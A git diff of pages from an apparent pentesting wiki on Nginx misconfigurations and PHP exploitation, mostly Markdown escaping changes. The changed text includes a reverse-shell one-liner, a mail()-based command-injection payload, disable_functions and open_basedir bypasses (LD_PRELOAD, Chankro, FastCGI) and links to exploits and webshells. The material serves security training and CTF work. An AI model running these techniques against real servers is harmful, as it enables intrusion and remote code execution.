-[proxy_intercept_errors](http://nginx.org/en/docs/http/ngx_http_proxy_module.html#proxy_intercept_errors) will serve a custom response if the backend has a response status greater than 300. In our uWSGI application above, we will send a `500 Error` which would be intercepted by Nginx.
+[proxy\_intercept\_errors](http://nginx.org/en/docs/http/ngx\_http\_proxy\_module.html#proxy\_intercept\_errors) will serve a custom response if the backend has a response status greater than 300. In our uWSGI application above, we will send a `500 Error` which would be intercepted by Nginx.
 
-[proxy_hide_header](http://nginx.org/en/docs/http/ngx_http_proxy_module.html#proxy_hide_header) is pretty much self explanatory; it will hide any specified HTTP header from the client. 
+[proxy\_hide\_header](http://nginx.org/en/docs/http/ngx\_http\_proxy\_module.html#proxy\_hide\_header) is pretty much self explanatory; it will hide any specified HTTP header from the client.&#x20;
 
 If we send a normal `GET` request, Nginx will return:
 
@@ -189,11 +189,11 @@ Secret-Header: secret-info
 Secret info, should not be visible!
 ```
 
-## merge_slashes set to off
+## merge\_slashes set to off
 
-The [merge_slashes](http://nginx.org/en/docs/http/ngx_http_core_module.html#merge_slashes) directive is set to “on” by default which is a mechanism to compress two or more forward slashes into one, so `///` would become `/`. If Nginx is used as a reverse-proxy and the application that’s being proxied is vulnerable to local file inclusion, using extra slashes in the request could leave room for exploit it. This is described in detail by [Danny Robinson and Rotem Bar](https://medium.com/appsflyer/nginx-may-be-protecting-your-applications-from-traversal-attacks-without-you-even-knowing-b08f882fd43d).
+The [merge\_slashes](http://nginx.org/en/docs/http/ngx\_http\_core\_module.html#merge\_slashes) directive is set to “on” by default which is a mechanism to compress two or more forward slashes into one, so `///` would become `/`. If Nginx is used as a reverse-proxy and the application that’s being proxied is vulnerable to local file inclusion, using extra slashes in the request could leave room for exploit it. This is described in detail by [Danny Robinson and Rotem Bar](https://medium.com/appsflyer/nginx-may-be-protecting-your-applications-from-traversal-attacks-without-you-even-knowing-b08f882fd43d).
 
-We found 33 Nginx configuration files with `merge_slashes` set to “off”.  
+We found 33 Nginx configuration files with `merge_slashes` set to “off”. &#x20;
 
 ## Try it yourself
 
diff --git a/pentesting/pentesting-web/php-tricks-esp/README.md b/pentesting/pentesting-web/php-tricks-esp/README.md
index e6b95ab0..b60f93cb 100644
--- a/pentesting/pentesting-web/php-tricks-esp/README.md
+++ b/pentesting/pentesting-web/php-tricks-esp/README.md
@@ -30,7 +30,7 @@ PHP comparison tables: [https://www.php.net/manual/en/types.comparisons.php](htt
 
 {% file src="../../../.gitbook/assets/EN-PHP-loose-comparison-Type-Juggling-OWASP (1).pdf" %}
 
-* `"string" == 0 -> True`** **A string which doesn't start with a number is equals to a number
+* `"string" == 0 -> True` **** A string which doesn't start with a number is equals to a number
 * `"0xAAAA" == "43690" -> True` Strings composed by numbers in dec or hex format can be compare to other numbers/strings with True as result if the numbers were the same (numbers in a string are interpreted as numbers)
 * `"0e3264578" == 0 --> True` A string starting with "0e" and followed by anything will be equals to 0
 * `"0X3264578" == 0X --> True` A string starting with "0" and followed by any letter (X can be any letter) and followed by anything will be equals to 0
@@ -43,7 +43,7 @@ Se puede intentar enviar los datos encodeados como json a ver si los lee (hay qu
 
 [https://medium.com/swlh/php-type-juggling-vulnerabilities-3e28c4ed5c09](https://medium.com/swlh/php-type-juggling-vulnerabilities-3e28c4ed5c09)
 
-### **in_array()**
+### **in\_array()**
 
 **Type Juggling** also affects to the `in_array()` function by default (you need to set to true the third argument to make an strict comparison):
 
@@ -70,19 +70,19 @@ The same error occurs with `strcasecmp()`
 
 ### Strict type Juggling
 
-Even if `===` is **being used **there could be errors that makes the **comparison vulnerable **to **type juggling**. For example, if the comparison is **converting the data to a different type of object before comparing**:
+Even if `===` is **being used** there could be errors that makes the **comparison vulnerable** to **type juggling**. For example, if the comparison is **converting the data to a different type of object before comparing**:
 
 ```php
 (int) "1abc" === (int) "1xyz" //This will be true
 ```
 
-### preg_match(/^.\*/)
+### preg\_match(/^.\*/)
 
-**`preg_match()`** could be used to **validate user input** (it **checks **if any **word/regex** from a **blacklist **is **present **on the **user input **and if it's not, the code can continue it's execution).
+**`preg_match()`** could be used to **validate user input** (it **checks** if any **word/regex** from a **blacklist** is **present** on the **user input** and if it's not, the code can continue it's execution).
 
 #### New line bypass
 
-However, when delimiting the start of the regexp`preg_match()` **only checks the first line of the user input**, then if somehow you can **send **the input in **several lines**, you could be able to bypass this check. Example:
+However, when delimiting the start of the regexp`preg_match()` **only checks the first line of the user input**, then if somehow you can **send** the input in **several lines**, you could be able to bypass this check. Example:
 
 ```php
 $myinput="aaaaaaa
@@ -110,7 +110,7 @@ Find an example here: [https://ramadistra.dev/fbctf-2019-rceservice](https://ram
 #### **Length error bypass**
 
 (This bypass was tried apparently on PHP 5.2.5 and I couldn't make it work on PHP 7.3.15)\
-If you can send to `preg_match()` a valid very **large input**, it **won't be able to process it** and you will be able to **bypass **the check. For example, if it is blacklisting a JSON you could send:
+If you can send to `preg_match()` a valid very **large input**, it **won't be able to process it** and you will be able to **bypass** the check. For example, if it is blacklisting a JSON you could send:
 
 ```
 payload = '{"cmd": "ls -la", "injected": "'+ "a"*1000000 + '"}'
@@ -133,7 +133,7 @@ $obfs += ""; //int 7
 
 ## More tricks
 
-**register_globals**: En PHP < 4.1.1 o si se ha configurado mal puede ser que las register_globals estén activas (o se esté imitando su comportamiento). Esto implica que en variables globales como $\_GET si estas poseen un valor por ejemplo $\_GET\["param"]="1234", puedes acceder a este mediante $param. Por lo tanto, enviando parámetros de Get o Post se pueden sobreescribir variables que se usan dentro del código.
+**register\_globals**: En PHP < 4.1.1 o si se ha configurado mal puede ser que las register\_globals estén activas (o se esté imitando su comportamiento). Esto implica que en variables globales como $\_GET si estas poseen un valor por ejemplo $\_GET\["param"]="1234", puedes acceder a este mediante $param. Por lo tanto, enviando parámetros de Get o Post se pueden sobreescribir variables que se usan dentro del código.
 
 Las **variables de sesión** (asociadas al **PHPSESSION**) de un dominio se guardan en el mismo sitio, por lo tanto si dentro de un dominio se usan distintas cookies en distintos paths se puede hacer que un path acceda a la cookie del otro accediendo a dicho path con la cookie del otro. De esta forma si los dos paths acceden a una variable con el mismo nombre puedes hacer que el valor de dicha variable en el path1 se aplique al path2. Y entonces el path2 tomará como válidas las variables del path1 (al ponerle a la cookie el nombre que le corresponde en el path2).
 
@@ -143,10 +143,10 @@ When you have the **usernames** of teh users of the machine. Check the address:
 
 ****[**LFI and RCE using php wrappers**](../../../pentesting-web/file-inclusion/)****
 
-### **password_hash/**password_verify
+### **password\_hash/**password\_verify
 
 This functions are typically used in PHP to **generate hashes from passwords** and to to **check** if a password is correct compared with a hash.\
-The supported algorithms are: `PASSWORD_DEFAULT` and `PASSWORD_BCRYPT` (starts with `$2y$`). Note that **PASSWORD_DEFAULT is frequently the same as PASSWORD_BCRYPT. **And currently, **PASSWORD_BCRYPT **has a **size limitation in the input of 72bytes**. Therefore, when you try to hash something larger than 72bytes with this algorithm only the first 72B will be used:
+The supported algorithms are: `PASSWORD_DEFAULT` and `PASSWORD_BCRYPT` (starts with `$2y$`). Note that **PASSWORD\_DEFAULT is frequently the same as PASSWORD\_BCRYPT.** And currently, **PASSWORD\_BCRYPT** has a **size limitation in the input of 72bytes**. Therefore, when you try to hash something larger than 72bytes with this algorithm only the first 72B will be used:
 
 ```php
 $cont=71; echo password_verify(str_repeat("a",$cont), password_hash(str_repeat("a",$cont)."b", PASSW
@@ -160,11 +160,11 @@ True
 
 **system("ls");**\
 **\`ls\`;**\
-**shell_exec("ls");**
+**shell\_exec("ls");**
 
-[Check this for more useful PHP functions](php-useful-functions-disable_functions-open_basedir-bypass/)
+[Check this for more useful PHP functions](php-useful-functions-disable\_functions-open\_basedir-bypass/)
 
-### **Code execution using** **preg_replace()**
+### **Code execution using** **preg\_replace()**
 
 ```php
 preg_replace(pattern,replace,base)
@@ -172,7 +172,7 @@ preg_replace("/a/e","phpinfo()","whatever")
 ```
 
 To execute the code in the "replace" argument is needed at least one match.\
-This option of preg_replace has been **deprecated as of PHP 5.5.0.**
+This option of preg\_replace has been **deprecated as of PHP 5.5.0.**
 
 ### **Code execution with Eval()**
 
@@ -194,7 +194,7 @@ Esta función dentro de php permite ejecutar código que está escrito en un str
 
 El caso es que hay que romper la query, ejecutar algo y volver a arreglarla (para ello nos servimos del "and" o "%26%26" o "|" --> el "or", "||" no funcionan pues si la primera es cierta deja de ejecutar y el ";" no funciona pues solo ejecuta la primera parte).
 
-**Other option** is to add to the string the execution of the command:  _'.highlight_file('.passwd').'_
+**Other option** is to add to the string the execution of the command:  _'.highlight\_file('.passwd').'_
 
 **Other option** (if you have the internal code) is to modify some variable to alter the execution: _$file = "hola"_
 
@@ -251,7 +251,7 @@ If yo are debugging a PHP application you can globally enable error printing in`
 
 ### Deobfuscating PHP code
 
-You can use the **web**[** www.unphp.net**](http://www.unphp.net)** to deobfuscate php code.**
+You can use the **web**[ **www.unphp.net**](http://www.unphp.net) **to deobfuscate php code.**
 
 ## Variable variables
 
@@ -270,7 +270,7 @@ echo "$x ${Da}"; //Da Drums
 
 ## Xdebug unauthenticated RCE
 
-If you see that **Xdebug** is **enabled** in a `phpconfig()` output you should try to get RCE via [https://github.com/nqxcode/xdebug-exploit](https://github.com/nqxcode/xdebug-exploit) 
+If you see that **Xdebug** is **enabled** in a `phpconfig()` output you should try to get RCE via [https://github.com/nqxcode/xdebug-exploit](https://github.com/nqxcode/xdebug-exploit)&#x20;
 
 ## Execute PHP without letters
 
diff --git a/pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/README.md b/pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/README.md
index 5346b978..e1c8d9c3 100644
--- a/pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/README.md
+++ b/pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/README.md
@@ -1,4 +1,4 @@
-# PHP - Useful Functions & disable_functions/open_basedir bypass
+# PHP - Useful Functions & disable\_functions/open\_basedir bypass
 
 ## PHP Command & Code Execution
 
@@ -22,13 +22,13 @@ echo passthru("uname -a");
 echo system("uname -a");
 ```
 
-**shell_exec** - Returns commands output
+**shell\_exec** - Returns commands output
 
 ```bash
 echo shell_exec("uname -a");
 ```
 
-\`\` (backticks) - Same as shell_exec()
+\`\` (backticks) - Same as shell\_exec()
 
 ```bash
 echo `uname -a`
@@ -40,65 +40,65 @@ echo `uname -a`
 echo fread(popen("/bin/ls /", "r"), 4096);
 ```
 
-**proc_open** - Similar to popen() but greater degree of control
+**proc\_open** - Similar to popen() but greater degree of control
 
 ```bash
 proc_close(proc_open("uname -a",array(),$something));
 ```
 
-**preg_replace**
+**preg\_replace**
 
 ```php
 <?php preg_replace('/.*/e', 'system("whoami");', ''); ?>
 ```
 
-**pcntl_exec** - Executes a program (by default in modern and not so modern PHP you need to load the `pcntl.so` module to use this function)
+**pcntl\_exec** - Executes a program (by default in modern and not so modern PHP you need to load the `pcntl.so` module to use this function)
 
 ```bash
 pcntl_exec("/bin/bash", ["-c", "bash -i >& /dev/tcp/127.0.0.1/4444 0>&1"]);
 ```
 
-**mail / mb_send_mail **-** **This function is used to send mails, but it can also be abused to inject arbitrary commands inside the `$options` parameter. This is because **php `mail` function **usually call `sendmail` binary inside the system and it allows you to** put extra options**. However, you won't be able to see the output of the executed command, so it's recommended to create shell script that writes the output to a file, execute it using mail, and print the output:
+**mail / mb\_send\_mail** - **** This function is used to send mails, but it can also be abused to inject arbitrary commands inside the `$options` parameter. This is because **php `mail` function** usually call `sendmail` binary inside the system and it allows you to **put extra options**. However, you won't be able to see the output of the executed command, so it's recommended to create shell script that writes the output to a file, execute it using mail, and print the output:
 
 ```bash
 file_put_contents('/www/readflag.sh', base64_decode('IyEvYmluL3NoCi9yZWFkZmxhZyA+IC90bXAvZmxhZy50eHQKCg==')); chmod('/www/readflag.sh', 0777);  mail('', '', '', '', '-H \"exec /www/readflag.sh\"'); echo file_get_contents('/tmp/flag.txt');
 ```
 
-**dl** - This function can be used to dynamically load a PHP extension. This function won't be present always, so you should check if it's available before trying to exploit it. Read[ this page to learn how to exploit this function](disable_functions-bypass-dl-function.md).
+**dl** - This function can be used to dynamically load a PHP extension. This function won't be present always, so you should check if it's available before trying to exploit it. Read[ this page to learn how to exploit this function](disable\_functions-bypass-dl-function.md).
 
 ### PHP Code Execution
 
 Apart from eval there are other ways to execute PHP code: include/require can be used for remote code execution in the form of Local File Include and Remote File Include vulnerabilities.\
 **${\<php code>}** - If your input gets reflected in any PHP string, it will be executed.\
 **eval()**\
-**assert() **- identical to eval()\
-**preg_replace('/.\*/e',...)** - /e does an eval() on the match\
-**create_function() **- Create a function and use eval()\
+**assert()** - identical to eval()\
+**preg\_replace('/.\*/e',...)** - /e does an eval() on the match\
+**create\_function()** - Create a function and use eval()\
 **include()**\
-**include_once()**\
+**include\_once()**\
 **require()**\
-**require_once()**\
-**$\_GET\['func_name']\($\_GET\['argument']);**\
-**$func = new ReflectionFunction($\_GET\['func_name']);**\
-**$func->invoke(); ** or\
+**require\_once()**\
+**$\_GET\['func\_name']\($\_GET\['argument']);**\
+**$func = new ReflectionFunction($\_GET\['func\_name']);**\
+**$func->invoke();** or\
 **$func->invokeArgs(array());**\
 **serialize/unserialize**
 
-## disable_functions & open_basedir
+## disable\_functions & open\_basedir
 
-**Disabled functions** is the setting that can be configured in `.ini` files in PHP that will **forbid **the use of the indicated **functions**. **Open basedir** is the setting that indicates to PHP the folder that it can access.\
+**Disabled functions** is the setting that can be configured in `.ini` files in PHP that will **forbid** the use of the indicated **functions**. **Open basedir** is the setting that indicates to PHP the folder that it can access.\
 The PHP setting sue to be configured in the path _/etc/php7/conf.d_ or similar.
 
-Both configuration can be seen in the output of**` phpinfo()`**:
+Both configuration can be seen in the output of **`phpinfo()`**:
 
 ![](https://0xrick.github.io/images/hackthebox/kryptos/17.png)
 
 ![](<../../../../.gitbook/assets/image (347).png>)
 
-## open_basedir Bypass
+## open\_basedir Bypass
 
-`open_basedir` will configure the folders that PHP can access, you **won't be able to to write/read/execute any file outside** those folders, but also you **won't even be able to list **other directories.\
-However, if somehow you are able to execute arbitrary PHP code you can **try **the following chunk of **codes **to try to **bypass **the restriction.
+`open_basedir` will configure the folders that PHP can access, you **won't be able to to write/read/execute any file outside** those folders, but also you **won't even be able to list** other directories.\
+However, if somehow you are able to execute arbitrary PHP code you can **try** the following chunk of **codes** to try to **bypass** the restriction.
 
 ### Listing dirs with glob:// bypass
 
@@ -125,17 +125,17 @@ foreach($file_list as $f){
 **Note2**: It looks like part of the code is duplicated, but that's actually necessary!\
 **Note3**: This example is only useful to list folders not to read files
 
-### Full open_basedir bypass abusing FastCGI
+### Full open\_basedir bypass abusing FastCGI
 
-If you want to **learn more about PHP-FPM and FastCGI **you can read the [first section of this page](disable_functions-bypass-php-fpm-fastcgi.md).\
-If **`php-fpm`** is configured you can abuse it to completely bypass **open_basedir**:
+If you want to **learn more about PHP-FPM and FastCGI** you can read the [first section of this page](disable\_functions-bypass-php-fpm-fastcgi.md).\
+If **`php-fpm`** is configured you can abuse it to completely bypass **open\_basedir**:
 
 ![](<../../../../.gitbook/assets/image (350).png>)
 
 ![](<../../../../.gitbook/assets/image (349).png>)
 
 Note that the first thing you need to do is find where is the **unix socket of php-fpm**. It use to be under `/var/run` so you can **use the previous code to list the directory and find it**.\
-Code from [here](https://balsn.tw/ctf_writeup/20190323-0ctf_tctf2019quals/#wallbreaker-easy).
+Code from [here](https://balsn.tw/ctf\_writeup/20190323-0ctf\_tctf2019quals/#wallbreaker-easy).
 
 ```php
 <?php
@@ -488,18 +488,18 @@ echo $client->request($params, $code)."\n";
 ?>
 ```
 
-This scripts will communicate with **unix socket of php-fpm** (usually located in /var/run if fpm is used) to execute arbitrary code. The `open_basedir` settings will be overwritten by the  **PHP_VALUE **attribute that is sent.\
-Note how `eval` is used to execute the PHP code you send inside the **cmd **parameter.\
+This scripts will communicate with **unix socket of php-fpm** (usually located in /var/run if fpm is used) to execute arbitrary code. The `open_basedir` settings will be overwritten by the  **PHP\_VALUE** attribute that is sent.\
+Note how `eval` is used to execute the PHP code you send inside the **cmd** parameter.\
 Also note the **commented line 324**, you can uncomment it and the **payload will automatically connect to the given URL and execute the PHP code** contained there.\
 Just access `http://vulnerable.com:1337/l.php?cmd=echo file_get_contents('/etc/passwd');` to get the content of the `/etc/passwd` file.
 
 {% hint style="warning" %}
-You may be thinking that just in the same way we have overwritten `open_basedir` configuration we can** overwrite `disable_functions`**. Well, try it, but it won't work, apparently **`disable_functions` can only be configured in a `.ini` php **configuration file and the changes you perform using PHP_VALUE won't be effective on this specific setting. 
+You may be thinking that just in the same way we have overwritten `open_basedir` configuration we can **overwrite `disable_functions`**. Well, try it, but it won't work, apparently **`disable_functions` can only be configured in a `.ini` php** configuration file and the changes you perform using PHP\_VALUE won't be effective on this specific setting.&#x20;
 {% endhint %}
 
-## disable_functions Bypass
+## disable\_functions Bypass
 
-If you manage have PHP code executing inside a machine you probably want to go to the next level and **execute arbitrary system commands**.  In this situation is usual to discover that most or all the PHP **functions **that allow to **execute system commands have been disabled **in **`disable_functions`.**\
+If you manage have PHP code executing inside a machine you probably want to go to the next level and **execute arbitrary system commands**.  In this situation is usual to discover that most or all the PHP **functions** that allow to **execute system commands have been disabled** in **`disable_functions`.**\
 ****So, lets see how you can bypass this restriction (if you can)
 
 ### Automatic bypass discovery
@@ -510,17 +510,17 @@ You can use the tool [https://github.com/teambi0s/dfunc-bypasser](https://github
 
 Just return to the begging of this page and **check if any of the command executing functions isn't disabled and available in the environment**. If you find just 1 of them, you will be able to use it to execute arbitrary system commands.
 
-### LD_PRELOAD bypass
+### LD\_PRELOAD bypass
 
 It's well known that some functions in PHP like `mail()`are going to **execute binaries inside the system**. Therefore, you can abuse them using the environment variable `LD_PRELOAD` to make them load an arbitrary library that can execute anything.
 
-#### Functions that can be used to bypass disable_functions with LD_PRELOAD
+#### Functions that can be used to bypass disable\_functions with LD\_PRELOAD
 
 1. `mail`
-2. `mb_send_mail` : If your system has `php-mbstring` module installed then this function can be used to bypass php disable_functions.
-3. `imap_mail` : If your system has `php-imap` module installed then this function also can be used to bypass the php disable_functions.
-4. `libvirt_connect` : If your system has `php-libvirt-php` module installed then this function also can be used to bypass disable_functions.
-5. `gnupg_init` : If your system has `php-gnupg` module installed then this function also can be used to bypass disable_functions.
+2. `mb_send_mail` : If your system has `php-mbstring` module installed then this function can be used to bypass php disable\_functions.
+3. `imap_mail` : If your system has `php-imap` module installed then this function also can be used to bypass the php disable\_functions.
+4. `libvirt_connect` : If your system has `php-libvirt-php` module installed then this function also can be used to bypass disable\_functions.
+5. `gnupg_init` : If your system has `php-gnupg` module installed then this function also can be used to bypass disable\_functions.
 6. `new imagick()`: You can [**find here a writeup**](https://blog.bi0s.in/2019/10/23/Web/BSidesDelhi19-evalme/) to learn how to abuse this class
 
 You can find [**here**](https://github.com/tarunkant/fuzzphunc/blob/master/lazyFuzzer.py) the fuzzing script that was used to find those functions.
@@ -542,11 +542,11 @@ uid_t getuid(void){
 
 #### Bypass using Chankro
 
-In order to abuse this misconfiguration you can [**Chankro**](https://github.com/TarlogicSecurity/Chankro). This is a tool that will **generate a PHP exploit **that you need to upload to the vulnerable server and execute it (access it via web).\
-**Chankro **will write inside the victims disc the **library and the reverse shell** you want to execute and will use the**`LD_PRELOAD` trick + PHP `mail()`** function to execute the reverse shell.
+In order to abuse this misconfiguration you can [**Chankro**](https://github.com/TarlogicSecurity/Chankro). This is a tool that will **generate a PHP exploit** that you need to upload to the vulnerable server and execute it (access it via web).\
+**Chankro** will write inside the victims disc the **library and the reverse shell** you want to execute and will use the**`LD_PRELOAD` trick + PHP `mail()`** function to execute the reverse shell.
 
 Note that in order to use **Chankro**, `mail` and `putenv` **cannot appear inside the `disable_functions` list**.\
-In the following example you can see how to** create a chankro exploit** for **arch 64**, that will execute `whoami` and save the out in _/tmp/chankro_shell.out_, chankro will **write the library and the payload** in _/tmp_ and the **final exploit **is going to be called **bicho.php** (that's the file you need to upload to the victims server):
+In the following example you can see how to **create a chankro exploit** for **arch 64**, that will execute `whoami` and save the out in _/tmp/chankro\_shell.out_, chankro will **write the library and the payload** in _/tmp_ and the **final exploit** is going to be called **bicho.php** (that's the file you need to upload to the victims server):
 
 {% tabs %}
 {% tab title="shell.sh" %}
@@ -563,20 +563,20 @@ python2 chankro.py --arch 64 --input shell.sh --path /tmp --output bicho.php
 {% endtab %}
 {% endtabs %}
 
-If you find that **mail** function is blocked by disabled functions, you may still be able to use the function **mb_send_mail.**\
-More information about this technique and Chankro here: [https://www.tarlogic.com/en/blog/how-to-bypass-disable_functions-and-open_basedir/](https://www.tarlogic.com/en/blog/how-to-bypass-disable_functions-and-open_basedir/)
+If you find that **mail** function is blocked by disabled functions, you may still be able to use the function **mb\_send\_mail.**\
+More information about this technique and Chankro here: [https://www.tarlogic.com/en/blog/how-to-bypass-disable\_functions-and-open\_basedir/](https://www.tarlogic.com/en/blog/how-to-bypass-disable\_functions-and-open\_basedir/)
 
 ### "Bypass" using PHP capabilities
 
-Note that using **PHP **you can** read and write files, create directories and change permissions**.\
+Note that using **PHP** you can **read and write files, create directories and change permissions**.\
 You can even **dump databases**.\
-Maybe using **PHP **to **enumerate **the box you can find a way to escalate privileges/execute commands (for example reading some private ssh key).
+Maybe using **PHP** to **enumerate** the box you can find a way to escalate privileges/execute commands (for example reading some private ssh key).
 
 I have created a webshell that makes very easy to perform this actions (note that most webshells will offer you this options also): [https://github.com/carlospolop/phpwebshelllimited](https://github.com/carlospolop/phpwebshelllimited)
 
 ### Modules/Version dependent bypasses
 
-There are several ways to bypass disable_functions if some specific module is being used or exploit some specific PHP version:
+There are several ways to bypass disable\_functions if some specific module is being used or exploit some specific PHP version:
 
 * ****[**This exploit**](https://github.com/mm0r1/exploits/tree/master/php-filter-bypass)****
   * 5.\* - exploitable with minor changes to the PoC
@@ -587,24 +587,24 @@ There are several ways to bypass disable_functions if some specific module is be
   * 7.4 - all versions to date
   * 8.0 - all versions to date
 * ****[**From 7.0 to 8.0 exploit (Unix only)**](https://github.com/mm0r1/exploits/blob/master/php-filter-bypass/exploit.php)****
-* [**FastCGI/PHP-FPM (FastCGI Process Manager)**](disable_functions-bypass-php-fpm-fastcgi.md)****
+* [**FastCGI/PHP-FPM (FastCGI Process Manager)**](disable\_functions-bypass-php-fpm-fastcgi.md)****
 * **dl function**
-* ****[**PHP 7.0=7.4 (\*nix)**](disable_functions-bypass-php-7.0-7.4-nix-only.md#php-7-0-7-4-nix-only)****
-* ****[**Imagick 3.3.0 PHP >= 5.4**](disable_functions-bypass-imagick-less-than-3.3.0-php-greater-than-5.4-exploit.md)****
-* [**PHP 5.x Shellsock**](disable_functions-php-5.x-shellshock-exploit.md)****
-* ****[**PHP 5.2.4 ionCube**](disable_functions-php-5.2.4-ioncube-extension-exploit.md)****
-* ****[**PHP <= 5.2.9 Windows**](disable_functions-bypass-php-less-than-5.2.9-on-windows.md)****
-* ****[**PHP 5.2.4/5.2.5 cURL**](disable_functions-bypass-php-5.2.4-and-5.2.5-php-curl.md)****
-* ****[**PHP Perl Extension Safe_mode**](disable_functions-bypass-php-perl-extension-safe_mode-bypass-exploit.md)****
-* ****[**PHP 5.2.3 -Win32std**](disable_functions-bypass-php-5.2.3-win32std-ext-protections-bypass.md)****
-* ****[**PHP 5.2 FOpen exploit**](disable_functions-bypass-php-5.2-fopen-exploit.md)****
-* ****[**Bypass via mem**](disable_functions-bypass-via-mem.md)****
-* ****[**mod_cgi**](disable_functions-bypass-mod_cgi.md)****
-* ****[**PHP 4 >= 4.2.-, PHP 5 pcntl_exec**](disable_functions-bypass-php-4-greater-than-4.2.0-php-5-pcntl_exec.md)****
+* ****[**PHP 7.0=7.4 (\*nix)**](disable\_functions-bypass-php-7.0-7.4-nix-only.md#php-7-0-7-4-nix-only)****
+* ****[**Imagick 3.3.0 PHP >= 5.4**](disable\_functions-bypass-imagick-less-than-3.3.0-php-greater-than-5.4-exploit.md)****
+* [**PHP 5.x Shellsock**](disable\_functions-php-5.x-shellshock-exploit.md)****
+* ****[**PHP 5.2.4 ionCube**](disable\_functions-php-5.2.4-ioncube-extension-exploit.md)****
+* ****[**PHP <= 5.2.9 Windows**](disable\_functions-bypass-php-less-than-5.2.9-on-windows.md)****
+* ****[**PHP 5.2.4/5.2.5 cURL**](disable\_functions-bypass-php-5.2.4-and-5.2.5-php-curl.md)****
+* ****[**PHP Perl Extension Safe\_mode**](disable\_functions-bypass-php-perl-extension-safe\_mode-bypass-exploit.md)****
+* ****[**PHP 5.2.3 -Win32std**](disable\_functions-bypass-php-5.2.3-win32std-ext-protections-bypass.md)****
+* ****[**PHP 5.2 FOpen exploit**](disable\_functions-bypass-php-5.2-fopen-exploit.md)****
+* ****[**Bypass via mem**](disable\_functions-bypass-via-mem.md)****
+* ****[**mod\_cgi**](disable\_functions-bypass-mod\_cgi.md)****
+* ****[**PHP 4 >= 4.2.-, PHP 5 pcntl\_exec**](disable\_functions-bypass-php-4-greater-than-4.2.0-php-5-pcntl\_exec.md)****
 
 ### **ALL IN ONE**
 
-The code with more options mentioned here available I have found is [https://github.com/l3m0n/Bypass_Disable_functions_Shell/blob/master/shell.php](https://github.com/l3m0n/Bypass_Disable_functions_Shell/blob/master/shell.php)
+The code with more options mentioned here available I have found is [https://github.com/l3m0n/Bypass\_Disable\_functions\_Shell/blob/master/shell.php](https://github.com/l3m0n/Bypass\_Disable\_functions\_Shell/blob/master/shell.php)
 
 ## Other Interesting PHP functions
 
@@ -612,52 +612,52 @@ The code with more options mentioned here available I have found is [https://git
 
 These functions accept a string parameter which could be used to call a function of the attacker's choice. Depending on the function the attacker may or may not have the ability to pass a parameter. In that case an Information Disclosure function like phpinfo() could be used.\
 Function => Position of callback arguments\
-'ob_start' => 0,\
-'array_diff_uassoc' => -1,\
-'array_diff_ukey' => -1,\
-'array_filter' => 1,\
-'array_intersect_uassoc' => -1,\
-'array_intersect_ukey' => -1,\
-'array_map' => 0,\
-'array_reduce' => 1,\
-'array_udiff_assoc' => -1,\
-'array_udiff_uassoc' => array(-1, -2),\
-'array_udiff' => -1,\
-'array_uintersect_assoc' => -1,\
-'array_uintersect_uassoc' => array(-1, -2),\
-'array_uintersect' => -1,\
-'array_walk_recursive' => 1,\
-'array_walk' => 1,\
-'assert_options' => 1,\
+'ob\_start' => 0,\
+'array\_diff\_uassoc' => -1,\
+'array\_diff\_ukey' => -1,\
+'array\_filter' => 1,\
+'array\_intersect\_uassoc' => -1,\
+'array\_intersect\_ukey' => -1,\
+'array\_map' => 0,\
+'array\_reduce' => 1,\
+'array\_udiff\_assoc' => -1,\
+'array\_udiff\_uassoc' => array(-1, -2),\
+'array\_udiff' => -1,\
+'array\_uintersect\_assoc' => -1,\
+'array\_uintersect\_uassoc' => array(-1, -2),\
+'array\_uintersect' => -1,\
+'array\_walk\_recursive' => 1,\
+'array\_walk' => 1,\
+'assert\_options' => 1,\
 'uasort' => 1,\
 'uksort' => 1,\
 'usort' => 1,\
-'preg_replace_callback' => 1,\
-'spl_autoload_register' => 0,\
-'iterator_apply' => 1,\
-'call_user_func' => 0,\
-'call_user_func_array' => 0,\
-'register_shutdown_function' => 0,\
-'register_tick_function' => 0,\
-'set_error_handler' => 0,\
-'set_exception_handler' => 0,\
-'session_set_save_handler' => array(0, 1, 2, 3, 4, 5),\
-'sqlite_create_aggregate' => array(2, 3),\
-'sqlite_create_function' => 2,
+'preg\_replace\_callback' => 1,\
+'spl\_autoload\_register' => 0,\
+'iterator\_apply' => 1,\
+'call\_user\_func' => 0,\
+'call\_user\_func\_array' => 0,\
+'register\_shutdown\_function' => 0,\
+'register\_tick\_function' => 0,\
+'set\_error\_handler' => 0,\
+'set\_exception\_handler' => 0,\
+'session\_set\_save\_handler' => array(0, 1, 2, 3, 4, 5),\
+'sqlite\_create\_aggregate' => array(2, 3),\
+'sqlite\_create\_function' => 2,
 
 ### Information Disclosure
 
 Most of these function calls are not sinks. But rather it maybe a vulnerability if any of the data returned is viewable to an attacker. If an attacker can see phpinfo() it is definitely a vulnerability.\
 **phpinfo**\
-**posix_mkfifo**\
-**posix_getlogin**\
-**posix_ttyname**\
+**posix\_mkfifo**\
+**posix\_getlogin**\
+**posix\_ttyname**\
 **getenv**\
-**get_current_user**\
-**proc_get_status**\
-**get_cfg_var**\
-**disk_free_space**\
-**disk_total_space**\
+**get\_current\_user**\
+**proc\_get\_status**\
+**get\_cfg\_var**\
+**disk\_free\_space**\
+**disk\_total\_space**\
 **diskfreespace**\
 **getcwd**\
 **getlastmo**\
@@ -668,27 +668,27 @@ Most of these function calls are not sinks. But rather it maybe a vulnerability
 
 ### Other
 
-**extract** - Opens the door for register_globals attacks (see study in scarlet).\
-**parse_str** - works like extract if only one argument is given.\
+**extract** - Opens the door for register\_globals attacks (see study in scarlet).\
+**parse\_str** - works like extract if only one argument is given.\
 putenv\
-**ini_set**\
+**ini\_set**\
 **mail** - has CRLF injection in the 3rd parameter, opens the door for spam.\
 **header** - on old systems CRLF injection could be used for xss or other purposes, now it is still a problem if they do a header("location: ..."); and they do not die();. The script keeps executing after a call to header(), and will still print output normally. This is nasty if you are trying to protect an administrative area.\
-**proc_nice**\
-**proc_terminate**\
-**proc_close**\
+**proc\_nice**\
+**proc\_terminate**\
+**proc\_close**\
 **pfsockopen**\
 **fsockopen**\
-**apache_child_terminate**\
-**posix_kill**\
-**posix_mkfifo**\
-**posix_setpgid**\
-**posix_setsid**\
-**posix_setuid**
+**apache\_child\_terminate**\
+**posix\_kill**\
+**posix\_mkfifo**\
+**posix\_setpgid**\
+**posix\_setsid**\
